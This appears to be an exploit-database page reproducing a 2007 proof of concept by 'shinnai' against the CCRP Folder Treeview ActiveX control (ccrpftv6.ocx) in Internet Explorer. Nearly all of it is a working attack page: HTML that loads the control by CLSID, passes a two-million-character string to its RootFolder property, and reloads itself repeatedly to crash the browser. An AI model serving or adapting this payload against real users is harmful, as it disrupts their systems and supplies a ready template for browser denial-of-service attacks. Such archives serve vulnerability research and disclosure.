[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CCRP Folder Treeview Control (ccrpftv6.ocx) IE Denial of Service Exploit
# Published : 2007-01-17
# Author : shinnai
# Previous Title : Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit
# Next Title : WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit


<!--
-------------------------------------------------------------------------------
CCRP Folder Treeview Control (ccrpftv6.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-------------------------------------------------------------------------------
-->

<html>
<object classid='clsid:19B7F2D6-1610-11D3-BF30-1AF820524153' id='CCRP' ></object>
<script language='vbscript'>

argCount = 1

arg1=String(2000000, "A")

CCRP.RootFolder = arg1

</script>

<script language='javascript'>
 document.location.reload()
</script>

# www.Syue.com [2007-01-17]